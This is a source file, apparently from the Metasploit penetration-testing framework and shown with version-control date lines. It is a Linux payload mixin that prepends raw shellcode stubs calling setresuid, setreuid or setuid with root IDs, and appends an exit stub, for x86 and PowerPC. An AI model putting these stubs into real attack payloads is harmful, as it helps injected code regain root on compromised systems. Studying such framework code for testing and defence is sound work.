2007-06-09 02:25:31 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
###
|
|
|
|
#
|
|
|
|
# This class is here to implement advanced features for linux-based
|
|
|
|
# payloads. Linux payloads are expected to include this module if
|
|
|
|
# they want to support these features.
|
|
|
|
#
|
|
|
|
###
|
|
|
|
module Msf::Payload::Linux
|
|
|
|
|
|
|
|
#
|
|
|
|
# This mixin is chained within payloads that target the Linux platform.
|
|
|
|
# It provides special prepends, to support things like chroot and setuid.
|
|
|
|
#
|
|
|
|
def initialize(info = {})
|
|
|
|
ret = super(info)
|
|
|
|
|
|
|
|
register_advanced_options(
|
|
|
|
[
|
2007-07-25 03:24:51 +00:00
|
|
|
Msf::OptBool.new('PrependSetresuid',
|
|
|
|
[
|
|
|
|
false,
|
|
|
|
"Prepend a stub that executes the setresuid(0, 0, 0) system call",
|
|
|
|
"false"
|
|
|
|
]
|
|
|
|
),
|
|
|
|
Msf::OptBool.new('PrependSetreuid',
|
|
|
|
[
|
|
|
|
false,
|
|
|
|
"Prepend a stub that executes the setreuid(0, 0) system call",
|
|
|
|
"false"
|
|
|
|
]
|
|
|
|
),
|
|
|
|
Msf::OptBool.new('PrependSetuid',
|
|
|
|
[
|
|
|
|
false,
|
|
|
|
"Prepend a stub that executes the setuid(0) system call",
|
|
|
|
"false"
|
|
|
|
]
|
|
|
|
),
|
|
|
|
Msf::OptBool.new('AppendExit',
|
|
|
|
[
|
|
|
|
false,
|
|
|
|
"Append a stub that executes the exit(0) system call",
|
|
|
|
"false"
|
|
|
|
]
|
|
|
|
),
|
2007-06-09 02:25:31 +00:00
|
|
|
], Msf::Payload::Linux)
|
2007-07-25 03:24:51 +00:00
|
|
|
|
2007-06-09 02:25:31 +00:00
|
|
|
ret
|
|
|
|
end
|
2007-07-25 03:24:51 +00:00
|
|
|
|
|
|
|
|
2007-06-09 02:25:31 +00:00
|
|
|
#
|
|
|
|
# Overload the generate() call to prefix our stubs
|
2007-07-25 03:24:51 +00:00
|
|
|
#
|
2007-06-09 02:25:31 +00:00
|
|
|
def generate(*args)
|
|
|
|
# Call the real generator to get the payload
|
|
|
|
buf = super(*args)
|
|
|
|
pre = ''
|
2007-07-25 03:24:51 +00:00
|
|
|
app = ''
|
|
|
|
|
2007-06-09 02:25:31 +00:00
|
|
|
test_arch = [ *(self.arch) ]
|
2007-07-25 03:24:51 +00:00
|
|
|
|
2007-06-09 02:25:31 +00:00
|
|
|
# Handle all x86 code here
|
2007-07-25 03:24:51 +00:00
|
|
|
if (test_arch.include?(ARCH_X86))
|
|
|
|
|
|
|
|
# Prepend
|
2007-06-09 02:25:31 +00:00
|
|
|
|
|
|
|
if (datastore['PrependSetresuid'])
|
2007-07-25 03:24:51 +00:00
|
|
|
# setresuid(0, 0, 0)
|
|
|
|
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
|
|
|
"\x31\xdb" +# xorl %ebx,%ebx #
|
|
|
|
"\xf7\xe3" +# mull %ebx #
|
|
|
|
"\xb0\xa4" +# movb $0xa4,%al #
|
|
|
|
"\xcd\x80" # int $0x80 #
|
|
|
|
end
|
2007-06-09 02:25:31 +00:00
|
|
|
|
|
|
|
if (datastore['PrependSetreuid'])
|
2007-07-25 03:24:51 +00:00
|
|
|
# setreuid(0, 0)
|
|
|
|
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
|
|
|
"\x31\xdb" +# xorl %ebx,%ebx #
|
|
|
|
"\x6a\x46" +# pushl $0x46 #
|
|
|
|
"\x58" +# popl %eax #
|
|
|
|
"\xcd\x80" # int $0x80 #
|
2007-06-09 02:25:31 +00:00
|
|
|
end
|
2007-07-25 03:24:51 +00:00
|
|
|
|
2007-06-09 02:25:31 +00:00
|
|
|
if (datastore['PrependSetuid'])
|
2007-07-25 03:24:51 +00:00
|
|
|
# setuid(0)
|
|
|
|
pre << "\x31\xdb" +# xorl %ebx,%ebx #
|
|
|
|
"\x6a\x17" +# pushl $0x17 #
|
|
|
|
"\x58" +# popl %eax #
|
|
|
|
"\xcd\x80" # int $0x80 #
|
2007-06-09 02:25:31 +00:00
|
|
|
end
|
2007-07-25 03:24:51 +00:00
|
|
|
|
|
|
|
# Append
|
|
|
|
|
|
|
|
if (datastore['AppendExit'])
|
|
|
|
# exit(0)
|
|
|
|
app << "\x31\xdb" +# xorl %ebx,%ebx #
|
|
|
|
"\x6a\x01" +# pushl $0x01 #
|
|
|
|
"\x58" +# popl %eax #
|
|
|
|
"\xcd\x80" # int $0x80 #
|
|
|
|
end
|
|
|
|
|
2007-06-09 02:25:31 +00:00
|
|
|
end
|
2007-07-25 03:24:51 +00:00
|
|
|
|
2008-11-13 01:57:53 +00:00
|
|
|
# Handle all Power/CBEA code here
|
|
|
|
if (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
|
|
|
|
|
|
|
|
# Prepend
|
|
|
|
|
|
|
|
if (datastore['PrependSetresuid'])
|
|
|
|
# setresuid(0, 0, 0)
|
|
|
|
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
|
|
|
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
|
|
|
|
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
|
|
|
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
|
|
|
"\x38\x1f\xfe\xa5" +# addi r0,r31,-347 #
|
|
|
|
"\x44\xff\xff\x02" # sc #
|
|
|
|
end
|
|
|
|
|
|
|
|
if (datastore['PrependSetreuid'])
|
|
|
|
# setreuid(0, 0)
|
|
|
|
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
|
|
|
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
|
|
|
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
|
|
|
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
|
|
|
|
"\x44\xff\xff\x02" # sc #
|
|
|
|
end
|
|
|
|
|
|
|
|
if (datastore['PrependSetuid'])
|
|
|
|
# setuid(0)
|
|
|
|
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
|
|
|
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
|
|
|
"\x38\x1f\xfe\x18" +# addi r0,r31,-488 #
|
|
|
|
"\x44\xff\xff\x02" # sc #
|
|
|
|
end
|
|
|
|
|
|
|
|
# Append
|
|
|
|
|
|
|
|
if (datastore['AppendExit'])
|
|
|
|
# exit(0)
|
|
|
|
app << "\x3b\xe0\x01\xff" +# li r31,511 #
|
|
|
|
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
|
|
|
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
|
|
|
|
"\x44\xff\xff\x02" # sc #
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
2007-07-25 03:24:51 +00:00
|
|
|
return (pre + buf + app)
|
2007-06-09 02:25:31 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
2008-11-13 01:57:53 +00:00
|
|
|
end
|